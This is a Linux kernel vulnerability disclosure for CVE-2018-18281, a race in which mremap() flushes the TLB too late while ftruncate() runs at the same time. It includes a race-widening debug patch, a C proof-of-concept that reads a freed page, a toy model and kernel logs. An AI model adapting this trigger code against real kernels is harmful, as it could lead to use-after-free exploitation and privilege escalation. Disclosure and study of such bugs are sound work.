Linux: mremap() TLB flush too late with concurrent ftruncate() 

CVE-2018-18281


Tested on the master branch (4.19.0-rc7+).

sys_mremap() takes current->mm->mmap_sem for writing, then calls
mremap_to()->move_vma()->move_page_tables(). move_page_tables() first
calls move_ptes() (which takes PTE locks, moves PTEs, and drops PTE
locks) in a loop, then performs a TLB flush with flush_tlb_range().
move_ptes() can also perform TLB flushes, but only when dirty PTEs are
encountered - non-dirty, accessed PTEs don't trigger such early flushes.
Between the move_ptes() loop and the TLB flush, the only lock being
held in move_page_tables() is current->mm->mmap_sem.

sys_ftruncate()->do_sys_ftruncate()->do_truncate()->notify_change()
->shmem_setattr()->unmap_mapping_range()->unmap_mapping_pages()
->unmap_mapping_range_tree()->unmap_mapping_range_vma()
->zap_page_range_single() can concurrently access the page tables of a
process that is in move_page_tables(), between the move_ptes() loop
and the TLB flush.

The following race can occur in a process with three threads A, B and C:

A: maps a file of size 0x1000 at address X, with PROT_READ and MAP_SHARED
C: starts reading from address X in a busyloop
A: starts an mremap() call that remaps from X to Y; syscall progresses
   until directly before the flush_tlb_range() call in
   move_page_tables().
[at this point, the PTE for X is gone, but C still has a read-only TLB
entry for X; the PTE for Y has been created]
B: uses sys_ftruncate() to change the file size to zero. This removes
   the PTE for address Y, then sends a TLB flush IPI *for address Y*.
   TLB entries *for address X* stay alive.

The kernel now assumes that the page is not referenced by any
userspace task anymore, but actually, thread C can still use the stale
TLB entry at address X to read from it.
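
The ordering above can be replayed in a toy user-space model. This is
only a sketch, not kernel code: struct toy_mm and every toy_* function
are hypothetical names invented for illustration, the "TLB" is a plain
array standing in for thread C's cached translations, and the three
threads are reduced to a fixed sequence of calls.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model (hypothetical, not kernel code): one page table and one
 * reader-side TLB, each with a slot for address X and address Y. */
enum { ADDR_X = 0, ADDR_Y = 1, NADDR = 2 };

struct toy_mm {
    bool pte[NADDR]; /* true: a PTE maps the page at this address */
    bool tlb[NADDR]; /* true: thread C holds a cached translation */
};

/* Thread C touches an address: hit in the TLB, or fill it from the PTE.
 * Returns true if the page is reachable through this address. */
static bool toy_read(struct toy_mm *mm, int addr)
{
    if (!mm->tlb[addr] && mm->pte[addr])
        mm->tlb[addr] = true;
    return mm->tlb[addr];
}

/* Thread A, first half of mremap(): move the PTE from X to Y, no flush. */
static void toy_move_ptes(struct toy_mm *mm)
{
    assert(mm->pte[ADDR_X]);
    mm->pte[ADDR_X] = false;
    mm->pte[ADDR_Y] = true;
}

/* Thread A, second half of mremap(): the deferred flush of the old range. */
static void toy_flush_old(struct toy_mm *mm)
{
    mm->tlb[ADDR_X] = false;
}

/* Thread B, ftruncate(): zap every PTE that is currently present and
 * flush the TLB only for the addresses where a PTE was found. */
static void toy_truncate(struct toy_mm *mm)
{
    for (int a = 0; a < NADDR; a++) {
        if (mm->pte[a]) {
            mm->pte[a] = false;
            mm->tlb[a] = false;
        }
    }
}

/* Racy order: truncate runs between the PTE move and the flush.
 * Returns true if C can still read the page after truncate finished. */
static bool toy_racy_order_leaves_stale_entry(void)
{
    struct toy_mm mm = { .pte = { true, false }, .tlb = { false, false } };
    toy_read(&mm, ADDR_X);              /* C caches the translation for X */
    toy_move_ptes(&mm);                 /* A: PTE now at Y, TLB untouched */
    toy_truncate(&mm);                  /* B: zaps Y, flushes only Y */
    bool stale = toy_read(&mm, ADDR_X); /* C: still hits the entry for X */
    toy_flush_old(&mm);                 /* A: flush arrives too late */
    return stale;
}

/* Same steps, but with the flush completed before truncate runs. */
static bool toy_flush_first_leaves_stale_entry(void)
{
    struct toy_mm mm = { .pte = { true, false }, .tlb = { false, false } };
    toy_read(&mm, ADDR_X);
    toy_move_ptes(&mm);
    toy_flush_old(&mm);
    toy_truncate(&mm);
    return toy_read(&mm, ADDR_X);
}
```

In this model, toy_racy_order_leaves_stale_entry() reports that the
page is still reachable through X, while
toy_flush_first_leaves_stale_entry() does not. The model says nothing
about how the kernel should enforce that ordering.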

At this point, the page can be freed as soon as it disappears from the
LRU list (which I don't really understand); it looks like there are
various kernel interfaces that can be used to trigger
lru_add_drain_all(). For simplicity, I am using root privileges to
write to /proc/sys/vm/compact_memory in order to trigger this.


To test this, I configured my kernel with CONFIG_PAGE_TABLE_ISOLATION=n,
CONFIG_PREEMPT=y, CONFIG_PAGE_POISONING=y, and used the kernel
commandline flag "page_poison=1". I patched the kernel as follows to
widen the race window (and make debugging easier). A copy of the patch
is attached.

===========
diff --git a/arch/x86/mm/tlb.c b/arch/x86/mm/tlb.c
index e96b99eb800c..8156628a6204 100644
--- a/arch/x86/mm/tlb.c
+++ b/arch/x86/mm/tlb.c
@@ -567,6 +567,11 @@ static void flush_tlb_func_remote(void *info)
        if (f->mm && f->mm != this_cpu_read(cpu_tlbstate.loaded_mm))
                return;
 
+       if (strcmp(current->comm, "race2") == 0) {
+               pr_warn("remotely-triggered TLB shootdown: start=0x%lx end=0x%lx\n",
+                       f->start, f->end);
+       }
+
        count_vm_tlb_event(NR_TLB_REMOTE_FLUSH_RECEIVED);
        flush_tlb_func_common(f, false, TLB_REMOTE_SHOOTDOWN);
 }
diff --git a/mm/compaction.c b/mm/compaction.c
index faca45ebe62d..27594b4868ec 100644
--- a/mm/compaction.c
+++ b/mm/compaction.c
@@ -1852,11 +1852,15 @@ static void compact_nodes(void)
 {
        int nid;
 
+       pr_warn("compact_nodes entry\n");
+
        /* Flush pending updates to the LRU lists */
        lru_add_drain_all();
 
        for_each_online_node(nid)
                compact_node(nid);
+
+       pr_warn("compact_nodes exit\n");
 }
 
 /* The written value is actually unused, all memory is compacted */
diff --git a/mm/mremap.c b/mm/mremap.c
index 5c2e18505f75..be34e0a7258e 100644
--- a/mm/mremap.c
+++ b/mm/mremap.c
@@ -186,6 +186,7 @@ static void move_ptes(struct vm_area_struct *vma, pmd_t *old_pmd,
                flush_tlb_range(vma, old_end - len, old_end);
        else
                *need_flush = true;
+
        pte_unmap_unlock(old_pte - 1, old_ptl);
        if (need_rmap_locks)
                drop_rmap_locks(vma);
@@ -248,8 +249,18 @@ unsigned long move_page_tables(struct vm_area_struct *vma,
                move_ptes(vma, old_pmd, old_addr, old_addr + extent, new_vma,
                          new_pmd, new_addr, need_rmap_locks, &need_flush);
        }
-       if (need_flush)
+       if (need_flush) {
+               if (strcmp(current->comm, "race") == 0) {
+                       int i;
+                       pr_warn("spinning before flush\n");
+                       for (i=0; i<100000000; i++) barrier();
+                       pr_warn("spinning before flush done\n");
+               }
                flush_tlb_range(vma, old_end-len, old_addr);
+               if (strcmp(current->comm, "race") == 0) {
+                       pr_warn("flush done\n");
+               }
+       }
 
        mmu_notifier_invalidate_range_end(vma->vm_mm, mmun_start, mmun_end);
 
diff --git a/mm/page_poison.c b/mm/page_poison.c
index aa2b3d34e8ea..5ffe8b998573 100644
--- a/mm/page_poison.c
+++ b/mm/page_poison.c
@@ -34,6 +34,10 @@ static void poison_page(struct page *page)
 {
        void *addr = kmap_atomic(page);
 
+       if (*(unsigned long *)addr == 0x4141414141414141UL) {
+               WARN(1, "PAGE FREEING BACKTRACE");
+       }
+
        memset(addr, PAGE_POISON, PAGE_SIZE);
        kunmap_atomic(addr);
 }
diff --git a/mm/shmem.c b/mm/shmem.c
index 446942677cd4..838b5f77cc0e 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1043,6 +1043,11 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
                }
                if (newsize <= oldsize) {
                        loff_t holebegin = round_up(newsize, PAGE_SIZE);
+
+                       if (strcmp(current->comm, "race") == 0) {
+                               pr_warn("shmem_setattr entry\n");
+                       }
+
                        if (oldsize > holebegin)
                                unmap_mapping_range(inode->i_mapping,
                                                        holebegin, 0, 1);
@@ -1054,6 +1059,10 @@ static int shmem_setattr(struct dentry *dentry, struct iattr *attr)
                                unmap_mapping_range(inode->i_mapping,
                                                        holebegin, 0, 1);
 
+                       if (strcmp(current->comm, "race") == 0) {
+                               pr_warn("shmem_setattr exit\n");
+                       }
+
                        /*
                         * Part of the huge page can be beyond i_size: subject
                         * to shrink under memory pressure.
===========


Then, I ran the following testcase a few times (compile with
"gcc -O2 -o race race.c -pthread"; note that the binary name matters
because the kernel patch matches on current->comm):

===========
#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#define ul unsigned long

static int alloc_fd = -1;
#define allocptr ((ul *)0x100000000000)
#define allocptr2 ((ul *)0x100000002000)

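/* Thread C: rename to "race2" (matched by the tlb.c patch), then keep
 * reading the old address and report anything that is not 0x41 bytes. */
void *reader_fn(void *dummy) {
  prctl(PR_SET_NAME, "race2");
  while (1) {
    ul x = *(volatile ul *)allocptr;
    if (x != 0x4141414141414141UL) {
      printf("GOT 0x%016lx\n", x);
    }
  }
}

/* Thread B: truncate the file to zero, then trigger compaction so that
 * lru_add_drain_all() runs and the page can be freed. */
void *truncate_fn(void *dummy) {
  if (ftruncate(alloc_fd, 0)) err(1, "ftruncate");
  int sysctl_fd = open("/proc/sys/vm/compact_memory", O_WRONLY);
  if (sysctl_fd == -1) err(1, "unable to open sysctl");
  if (write(sysctl_fd, "1", 1) != 1) err(1, "unable to write sysctl");
  sleep(1);
  return 0;
}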

int main(void) {
  alloc_fd = open("/dev/shm/race_demo", O_RDWR|O_CREAT|O_TRUNC, 0600);
  if (alloc_fd == -1) err(1, "open");
  char buf[0x1000];
  memset(buf, 0x41, sizeof(buf));
  if (write(alloc_fd, buf, sizeof(buf)) != sizeof(buf)) err(1, "write");
  if (mmap(allocptr, 0x1000, PROT_READ, MAP_SHARED, alloc_fd, 0) != allocptr) err(1, "mmap");

  pthread_t reader;
  if (pthread_create(&reader, NULL, reader_fn, NULL)) errx(1, "thread");
  sleep(1);

  pthread_t truncator;
  if (pthread_create(&truncator, NULL, truncate_fn, NULL)) err(1, "thread2");

  if (mremap(allocptr, 0x1000, 0x1000, MREMAP_FIXED|MREMAP_MAYMOVE, allocptr2) != allocptr2) err(1, "mremap");
  sleep(1);
  return 0;
}
===========

After a few attempts, I get the following output:

===========
user@debian:~/mremap_ftruncate_race$ sudo ./race
GOT 0xaaaaaaaaaaaaaaaa
Segmentation fault
user@debian:~/mremap_ftruncate_race$ 
===========

Note that 0xaaaaaaaaaaaaaaaa is PAGE_POISON.
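
As a small illustration of why the reader sees that exact value: the
patched poison_page() above overwrites the page with
memset(addr, PAGE_POISON, PAGE_SIZE), so every byte becomes the poison
byte. The sketch below assumes PAGE_POISON is 0xaa (its value when
CONFIG_PAGE_POISONING_ZERO is not set) and a 4096-byte page; the TOY_*
macros and the function name are hypothetical stand-ins, not kernel
symbols.

```c
#include <assert.h>
#include <string.h>

/* Assumed values for illustration; the real constants live in the kernel. */
#define TOY_PAGE_POISON 0xaa
#define TOY_PAGE_SIZE   4096

/* Fill a fake page the way the testcase does (0x41 bytes), poison it the
 * way poison_page() does, and return the first word as the reader thread
 * would load it. */
static unsigned long toy_first_word_after_poison(void)
{
    static unsigned char page[TOY_PAGE_SIZE];
    unsigned long word;

    assert(sizeof(word) <= sizeof(page));

    memset(page, 0x41, sizeof(page));            /* file contents */
    memset(page, TOY_PAGE_POISON, sizeof(page)); /* page freed and poisoned */
    memcpy(&word, page, sizeof(word));           /* reader's load from X */
    return word;
}
```

With a 64-bit unsigned long, every byte of the returned word is 0xaa,
which matches the value printed by the reader thread.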

dmesg reports:
===========
shmem_setattr entry
shmem_setattr exit
spinning before flush
shmem_setattr entry
remotely-triggered TLB shootdown: start=0x100000002000 end=0x100000003000
shmem_setattr exit
compact_nodes entry
------------[ cut here ]------------
PAGE FREEING BACKTRACE
WARNING: CPU: 5 PID: 1334 at mm/page_poison.c:38 kernel_poison_pages+0x10a/0x180
Modules linked in: btrfs xor zstd_compress raid6_pq
CPU: 5 PID: 1334 Comm: kworker/5:1 Tainted: G        W         4.19.0-rc7+ #188
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
Workqueue: mm_percpu_wq lru_add_drain_per_cpu
RIP: 0010:kernel_poison_pages+0x10a/0x180
[...]
Call Trace:
 free_pcp_prepare+0x45/0xb0
 free_unref_page_list+0x7c/0x1b0
 ? __mod_zone_page_state+0x66/0xa0
 release_pages+0x178/0x390
 ? pagevec_move_tail_fn+0x2b0/0x2b0
 pagevec_lru_move_fn+0xb1/0xd0
 lru_add_drain_cpu+0xe0/0xf0
 lru_add_drain+0x1b/0x40
 process_one_work+0x1eb/0x400
 worker_thread+0x2d/0x3d0
 ? process_one_work+0x400/0x400
 kthread+0x113/0x130
 ? kthread_create_worker_on_cpu+0x70/0x70
 ret_from_fork+0x35/0x40
---[ end trace aed8d7b167ea0097 ]---
compact_nodes exit
spinning before flush done
flush done
race2[1430]: segfault at 100000000000 ip 000055f56e711b98 sp 00007f02d7823f40 error 4 in race[55f56e711000+1000]
[...]
===========


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Found by: jannh